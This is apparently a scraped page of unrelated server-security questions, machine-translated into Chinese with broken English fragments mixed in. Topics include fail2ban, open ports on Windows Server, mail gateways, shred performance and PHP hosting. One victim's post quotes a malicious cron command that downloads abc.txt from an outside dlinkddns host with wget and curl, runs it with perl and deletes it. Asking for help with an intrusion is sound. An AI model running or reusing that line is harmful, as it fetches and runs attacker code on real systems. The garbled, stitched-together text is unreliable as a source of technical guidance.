我有一个显示选举结果的页面。 有些人希望看到这些选举结果会在选举之夜继续点击刷新。 我不想阻止这种stream量 – 但我想在我的服务器上阻止简单的ping洪水等。 我应该如何configurationfail2ban以适应这些不同的规格?
我正在build立一个类似于TCP回显服务器的Linux服务器,并且想知道我应该关心的安全问题。 这将是一个枯燥的CentOS / KDE服务器,除了我的服务器二进制文件外,没有其他文件在我select的端口上侦听。 假设我的服务器中没有任何缓冲区溢出或类似的安全漏洞,如果我将服务器configuration为删除除了服务器正在侦听的端口之外的所有端口上的所有非TCP通信,我是否有很多担心? 服务器从只执行权限的用户运行,并使用强根密码。 我错过了什么? 谢谢。
美好的一天。 任何人都可以帮助我确定在安全的电子邮件网关上扫描外发邮件的标准层次结构(无论是否为供应商)? 在排队之前是否应该通过政策扫描邮件,或者反过来呢? 因为我们以前遇到的很多队列都是由于无法传递的,只能发现收件人是无效地址。 我们创build的策略似乎不会被触发,应该放弃预定的无效电子邮件。 谢谢!
我正在运行Windows Server 2012 R2。 目前,我想提高我的服务器的安全性,所以我正在寻找服务(和开放端口),这是不需要的。 我禁用了几乎所有的服务器angular色,除了IIS(我需要IIS)。 Windows防火墙configuration为每个入站/出站连接都没有规则,会自动阻塞。 我只为端口80,443和远程桌面端口创build了一些规则。 所有其他规则都被禁用(或设置为私有configuration文件),因此我的公共networking上没有其他端口/协议/服务的规则,因此不应该存在开放端口。 但是,如果我用nmap(tcp连接扫描)扫描我的服务器,有一些开放的端口。 例如: 25/tcp open smtp 80/tcp open http 110/tcp open pop3 119/tcp open nntp 143/tcp open imap 465/tcp open smtps 563/tcp open snews 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3389/tcp open rdp 我不需要pop,imap和其他服务(RDP 3389除外)。 现在我有一些问题:1.如果防火墙应该阻塞没有规则的所有端口(上面的端口没有规则),那么如何将端口显示为开放? 2.用netstat -anop tcp我查了哪些服务在这个端口上侦听。 这是系统服务。 但是为什么系统服务在这个端口上监听,我怎么能停止服务呢?
我有两台专用服务器,几天前开始向我发送有关运行未知cron作业的通知。 在这两台服务器上,我都有我的网站的二级帐户,黑客修改了这些帐户的cron作业,而不是root。 所以我想“也许”他们只有有限的访问。 两者都试图运行以下内容:cd / tmp; wget http://fastfoodz.dlinkddns.com/abc.txt;curl -O http://fastfoodz.dlinkddns.com/abc.txt;perl abc.txt; rm -f abc * 第一台服务器的Cronjob输出: http://pastebin.com/m56ga6pp 第二台服务器的Cronjob输出: http://pastebin.com/4utZ8agC 奇怪的是,这两个服务器似乎同时被黑客攻击,并使用相同的方法。 有没有人有这种黑客,可以给我的想法,他是怎么进来的,如果我可以删除它不重新安装..? 在服务器上有很多网站,第一个使用大约500GB,需要很多移动别的地方,重新安装。 提前致谢!
在遵循关于如何保护Ubuntu服务器的在线指南时,我在我的一个testing虚拟机上运行了这个命令。 sudo dpkg-statoverride –update –add root admin 4750 /bin/su 我知道这个命令的意图是将su的使用限制在特定的用户身上。 我没有意识到的是su在Ubuntu上已经被默认禁用了。 有人能告诉我如何在Ubuntu 12.04上反转它吗? 我已经试过了: sudo dpkg-statoverride –remove /bin/su
我打算通过无线PTP网桥将现有的Cisco 3750交换机连接到3560C交换机。 该网桥将受到WPA2保护,但是我正在寻求交换机之间的安全措施,以防止通过任一交换机进行其他无线访问。 他们不支持IPSec,只有802.1Q隧道,购买额外的硬件不太可能。 我正在考虑在交换机之间使用TrustSec手动模式 。 经过一番努力读入TrustSec和MACsec之后,我确定这是一个很好的select,因为它是一个共享的媒介。 两个问题: 我能否可靠地防止其他无线stream量使用TrustSec访问交换机? 有没有人知道3000系列交换机有更好的select?
对于任何知道自己在做什么的人来说,这可能是一个非常简单的问题,但我自己找不到任何答案。 我试图为我的好朋友设置一个子目录,以testing我的(Apache)托pipe计划上的PHP脚本。 但是,我不想让他访问我的服务器上的任何其他内容,原因很明显。 他的FTPlogin已经导致他到正确的目录,这不允许导航任何高于根(mydomain.com/friend/)。 我想同样的行为适用于任何脚本,所以他不能简单地 <?php print_r(glob("../*")); ?> 并查看我所有的文件。 我想这可以通过设置DocumentRoot的.htaccess文件来完成,但是我不能在用户目录中修改文件。 这可能没有主要重新连线的networking服务器? 我试着用谷歌search各种各样的东西来形容我的问题,但没有适当的术语,我得到的只是“共享主机”网站和试图向我推销安全软件包的人。
我寻找最好的解决scheme来logging所有连接客户端的IP到文本文件或login到我的VPN服务器的数据库。 在IP下,我指的是他们所连接的互联网上的公共WAN IP。 一个黑客可以肯定是使openvpn服务器日志到一个单独的日志文件,并定期运行logtail提取必要的信息。 所以我想要build立的数据库看起来像这样: Client_Name | Client_IP | Connection_date roadwarr1 | 72.84.99.11 | 03/04/14 – 22:44:00 Sat 请不要推荐我使用商业Openvpn访问服务器。 这不是一个真正的解决scheme。 如果可以确定断开的date会更好,那么我可以看到一个客户连接了多久,从哪里连接! 谢谢
我最近尝试了不同的磁盘随机化方法来找出最快完成工作的方法。 在计数器模式下AES的openssl随机数发生器被认为是相当快的 ,所以我试着将输出pipe道输出到dd (限制输出字节的总数并优化磁盘扇区大小)。 请参阅这里的调用。 使用这种技术,我能够以30MB / s左右的持续速率写入原始磁盘。 单独使用shred实用程序(以单通模式,使用/dev/urandom作为RNG),持续写入速率远远低于10 MB / s。 但是,使用openssl生成器的shred ,我能够支持大约1.5 GB / s的写入速度: mkfifo rand openssl enc -aes-256-ctr -pass pass:"$(dd if=/dev/urandom bs=128 count=1 2>/dev/null | base64)" -nosalt </dev/zero >rand & shred –verbose –random-source=rand -n1 /dev/sda rm rand 在这之前,我没有观察到接近这个速率的任何速度(无论是随机数字stream还是原始IO速度),所以我想知道这是否意味着shred是以某种方式采取(不安全的)快捷方式。 我意识到, shred本身可能只是使用给定的随机数生成器来种植自己的,更快的PRNG,但是AES 实际上比/dev/urandom快得多? 还是其他的事情发生在引擎盖下?